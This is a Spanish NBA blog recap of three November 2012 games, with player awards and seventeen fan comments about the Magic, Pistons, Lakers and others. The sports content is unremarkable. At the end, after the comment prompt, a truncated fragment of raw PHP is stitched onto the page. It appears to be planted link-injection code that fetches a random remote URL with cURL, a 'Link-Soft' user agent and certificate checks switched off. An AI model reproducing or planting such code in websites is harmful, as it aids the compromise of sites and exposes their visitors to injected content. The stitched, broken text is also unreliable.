La Crónica: Jornada electoral

07 de November de 2012 por txusma

Tocaba menú escueto. Sólo 3 partidos y ninguna sorpresa sobre el papel.

Lo más noticioso fue la primera derrota de Orlando en el habitualmente complicado United Center. Los de Florida vendieron cara su piel, con una desconocida versión “primera espada” de Afflalo, bien secundado por Davis, Vucevic y E’Twaun Moore. Chicago tuvo que tirar de remontada basada en una gran primera parte de Deng, la versátil contribución de Noah y la aportación clave de Nate Robinson, Butler y Gibson desde el banco. Es la segunda vez en la historia que Chicago comienza la temporada dejando a 4 rivales consecutivos por debajo de los 93 puntos. La otra fue en la 1997-98… Todos podemos recordar como terminó la cosa (93-99).

Victoria convincente de los Thunder sobre los Raptors. Los canadienses no supieron aprovechar el gran partido de Jonas Valanciunas, debido en parte a los problemas físicos que Kyle Lowry padeció antes del descanso. A pesar de esto Casey tomó la decisión de regular la presencia de Calderon en un choque que se veía muy cuesta arriba. Fue una actuación plácida para el equipo de Brooks que pudo repartir minutos entre los no habituales. Pudimos ver un rato en acción a Perry Jones III, Jeremy Lamb… e incluso una actuación sin precedentes de Thabbet, a pesar de que le dio tiempo a ser expulsado en 23 minutos de juego (88-108).

Finalmente, Denver se estrenó contra el equipo medicina de la competición, Detroit. A pesar del gran partido de Monroe, los de la Motown tiene un grave problema por dentro. Koufos, McGee, Faried o incluso Iguodala y Chandler se dedicaron a cargar el rebote logrando casi tantos ofensivos como sus rivales defensivos. Por fin pudimos ver la buena cara colectiva de los Nuggets (97-109). Es la segunda vez en la historia de los Pistons que pierden sus 4 primeros partidos. La anterior fue en 1980. 

PREMIOS

MVP: En ausencia de Derrick Rose, los Bulls se sustentan en Joakim Noah y Luol Deng, principalmente. Anoche, estos 2 jugadores estuvieron sobresaliente y, con 20 puntos, 9 rebotes, 4asistencias y 5 tapones el primero y 23 puntos, 8 rebotes y 4 asistencias el segundo, dieron la victoria a su equipo.

Rookie: Primer gran partido de Jonas Valanciunas. El lituano se fue a los 18 puntos y 6 rebotes. Le auguramos muchas más noches como esta.

Sorpresa: Los Magic están siendo propicios para las sorpresas. En ausencia de Jameer Nelson, E’twaun Moore se está destapando como un jugador a tener en cuenta y Nikola Vucevic hace lo propio al aprovechar la lesión de Gustavo Ayon, que ayer disputó sus primero minutos. El primero acabó con 17 puntos y el segundo con 16 puntos, 10 rebotes y 2 tapones.

Decepción: Con el partido de ayer Rodney Stuckey suma un 6 de 40 en tiros de campo en los 4 primeros partidos de la temporada. Un acierto del 15% a pesar de que precisamente ayer mejoró su estadística gracias al 5 de 17 que se cascó. Eso sí, ¿cortarse? Nunca.

Esfuerzo en vano: Los Pistons siguen sin estrenarse y no será por el empeño que puso ayer Greg Monroe, autor de 27 puntos y 10 rebotes. Otro que cuajó un buen partido pero no recibió recompensa fue Arron Afflalo. Sus 28 puntos, 5 rebotes y 5 asistencias fueron insuficientes para imponerse a los Bulls.

TOP-5

Imágenes | AP Photos / Getty Images

Comenta

17 comentarios a esta entrada

  1. Denise dice:
    #1

    Pues me están gustando bastante los Magic, Vaughn se está destapando como un gran coach y motivador, ya que lo mas normal era que tras la huida de Howard, el grupo se desmotivara, pero para nada, todos parecen implicados. Además, sus rotaciones me gustan bastante.

    Ayer cuajaron un grandísimo partido en Chicago y todo ello con las bajas de 3 teóricos titulares como Nelson, Turkoglu y Harrington.

    Mencionar sobre todo el gran rendimiento de Moore, que ya se veía venir después de la gran pretemporada que hizo. Vaya jugón; y además también puede complementarse con Nelson jugando los dos a la vez, no son sustitutivos.
    Y otro que me ha sorprendido es Vucevic, no esperaba el rendimiento de este muchacho, que siempre está cerca del doble-doble pese a no jugar muchos minutos.

    Quizás soy demasiado optimista, pero yo ya decía que no me parecía tan mal equipo éstos Magic, a este nivel y si Ayón y Harrington vuelven bien tras sus lesiones; y si hay alguna importante lesión en equipos rivales, podrían aspirar a una plaza de Play-offs, aunque quizas lo mas inteligente sería hacer un poquito de tanking.

      Citar

  2. TheDeerHunter dice:
    #2

    @Denise: Gran ojo con el rendimiento de Davis y también con E’Tauwn Moore, porque otros también han hecho una excelente pretemporada y de momento se han quedado en eso.
    Vucevic no sorprende tanto, lo hizo razonablemente bien el año pasado. De Ayón se espera una razonable contribución a corto plazo.

    Sobre las tres bajas no creo que sean teóricos titulares… o si lo fueran cada día a menos si la cosa va como ahora. El caso del turco es especialmente sensible, pues condiciona excesivamente el juego. ¿Puede perder definitivamente su puesto en este momento? Me atrevería a decir que juegan mejor sin él…

      Citar

  3. Denise dice:
    #3

    TheDeerHunter: @Denise: Gran ojo con el rendimiento de Davis y también con E’Tauwn Moore, porque otros también han hecho una excelente pretemporada y de momento se han quedado en eso.Vucevic no sorprende tanto, lo hizo razonablemente bien el año pasado. De Ayón se espera una razonable contribución a corto plazo.Sobre las tres bajas no creo que sean teóricos titulares… o si lo fueran cada día a menos si la cosa va como ahora. El caso del turco es especialmente sensible, pues condiciona excesivamente el juego. ¿Puede perder definitivamente su puesto en este momento? Me atrevería a decir que juegan mejor sin él…

    Hombre, Nelson y Turkoglu a priori son fijos; Harrington quizas pueda hacer mas la labor de 6º hombre, en cualquier caso, titulares o no, son 3 tios importantes dentro del equipo.
    Yo tambien creo que sin Turkoglu juegan mejor, sin el corset que el turco le imprime al juego; pero esperaba que en estos Magic pudiera hacer buenas estadísticas y facilitar un trade con algun equipo. Con la lesión, habrá que comerselo con patatas.

    Y sobre Ayón, la verdad es que no ví mucho de los Hornets el año pasado, no lo puedo juzgar mucho, lo que espero es que no tenga la cabeza puesta en el Barça.

      Citar

  4. rumbero dice:
    #4

    Los de Motown tienen problemas por dentro, por fuera y por lo lados. Stuckey no ha empezado fino pero es que Knight lleva una pájara importante también. No sé que intención tiene Frank con esta plantilla, pero por lo que he visto me sobran un minutos de Prince y Maxiell y faltan de Jerebko y Drummond. El sueco es de lo mejorcito que tienen y Drummond lo poco que sale siempre cumple (ojo al triple en play Allen que se ha cascado hoy). A mi me gustaría ver una versión de estos Pistons con Jerebko jugando más de 3 y asi poder ver minutos juntos de Drummond-Monroe.

      Citar

  5. Ruxixón dice:
    #5

    El Raptors@Thunder ha sido un tostonaco de 4 pares,en cuanto han abierto brecha los locales adiós Raptors y eso ha sido en el primer cuarto.El remate han sido los minutos de John Lucas III en plan Rambo,vaya mandarinas el chaval.No sé,el partido menos adecuado para medir sus aspiraciones de PO’s pero salvo temporadón de Lowry,Valenciunas -el cual mola mucho y va a ser muuuuy bueno- y un milagro en forma de que la morralla del club de los DeRozan,Amir Johnson,Lucas -buffff- rindan a elevado nivel,no están para PO’s.10 millones al año DeRozan,pa pegarse un tiro.

    Por los Thunder poco que comentar,siguen en proceso post-Harden.Sensación de que no son tan superiores como antaño pero bueno,es muy pronto y tendrán que desarrollar química entre ellos.Versión buena de Ibaka en el tiro y sorprendente que “Cogote Dorado” Thabeet aún sea aprovechable para la causa.

    ¡¡¡Yo también quiero más Monroe-Drummond!!!

      Citar

  6. Jose Luis dice:
    #6

    3 meses más de baja Danny Granger… vaya palo para los Pacers, aunque espero que George juegue de 3 y ver como rinde en esa posición.

      Citar

  7. Viva_Dirk dice:
    #7

    Partido entretenido el Pistons-Nuggets. Los locales arrasaron la zona casi sin darse cuenta, tienen varios jugadores muy físicos y los Pistons son posiblemente el peor equipo físicamente de la competición, mas aun con la rotación actual.

    En Denver me extraña mucho que Faried juegue tan poco, da muchas soluciones al juego ofensivo y es muy activo cada minuto que esta en cancha. McGee supongo que también ira ganando minutos aunque Koufos es un buen center.

    Por los Pistons coincido plenamente con Rumbero, Prince&Maxiel no pintan nada, ambos deberian salir via trade del equipo y en otro tipo de proyecto serian mucho mas útiles. También me gusta mucho Jerebko y creo que a Monroe le vendria de perlas jugar con Drummond ya que la mayoria de los centers de la liga son mas poderosos físicamente que el.

      Citar

  8. Jose Luis dice:
    #8

    Los Pacers contactan con Pietrus para subsanar la baja de Granger

      Citar

  9. Esteban dice:
    #9

    A los pintons no hay q buscarle muchas vueltas, son un pesimo equipo y por ende tendran un pesimo reghistro

    La renovacion de prince es algo inentendible, lo de stuckey se puede explicar un poco mas, pero sigue sin explotrar como lider, asi q podria ser un escudero en otro equipo
    Knight tiene pinta de un base suplente estilo watson y no mucho mas

    Lo unico rescatable es monroe y el futuro de drumond, y sobretodo las muchas chances de quedarse con el pick uno en el proximo draft

      Citar

  10. Jose Luis dice:
    #10

    Hombre Knight aún puede mejorar para establecerse de titular y tener carrera en la NBA, no para ser all-star pero sí para ser titular en un equipo de play-offs, sin tener una gran responsabilidad. Un estilo a Andre Miller es lo primero que me sale, o Raymond Felton, un tío que no sea ni la tercera espada del equipo pero asentado como titular, sin ser nunca all-star.

    Por cierto, buscando bases de estos… en 2009 fueron all-star Nelson y Mo Williams… dios xD vale que hicieran buenas temporadas, pero imagino que hubo muchas lesiones de por medio también. No me extraña la paliza que se llevaron puf, de 27.

      Citar

  11. HisRoyalAirness dice:
    #11

    Bueeeeeno, principio del segundo cuarto y los Lakers palman de 15.

    Por favor, por el bien de la liga, que Mr Potato se ponga a hacer las maletas

      Citar

  12. Pop dice:
    #12

    Es que están haciendo un partido de patio de colegio. Da grima.

      Citar

  13. Jose Luis dice:
    #13

    Es muy vergonzoso ver a Darius Morris tirándose todo lo que pilla… la leche, prefiero meter a Duhon

      Citar

  14. Jose Luis dice:
    #14

    Acaba de tirarse un triple desde la esquina… que para qué, y esa acción ha sido entre medias de dos triples back-to-back de Randy Foye… a 11 y quedan 7 minutos

      Citar

  15. Jose Luis dice:
    #15

    En fin, otra derrota de Lakers. Falta de actitud, de ganas, de defensa, de sistemas de ataque, todo va mal. Para colmo otros 37 minutos en pista todos los titulares. Meeks ni un minuto, Duhon ni un minuto (y Morris hinchándose). Qué mala pinta tiene este equipo a menos que echen al entrenador o se produzca algún acontecimiento que de un enorme golpe de tuerca a la situación.

      Citar

  16. Denise dice:
    #16

    Jose Luis:
    Es muy vergonzoso ver a Darius Morris tirándose todo lo que pilla… la leche, prefiero meter a Duhon

    Darius Morris es muyyyy malo. Goudelock era mucho mejor que él y le cortaron. Y hasta Dyhon lo haría mejor que Morris e incluso que Blake, que ya ha demostrado que no vale para estos Lakers.

      Citar

  17. nba dice:
    #17

    Bueno otra noche mas los Lakers empeñados en batir el record de los Bobcats de la temporada pasada, al final acabaremos recordando con afecto los tiempos de Smush Parker y Kwane Brown.
    Los Lakers tienen los jugadores necesarios, el tema esta en hacer uso de ellos de manera adecuada, y mientras sigan con Brown al mando de la nave es evidente que no van a ningun sitio

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>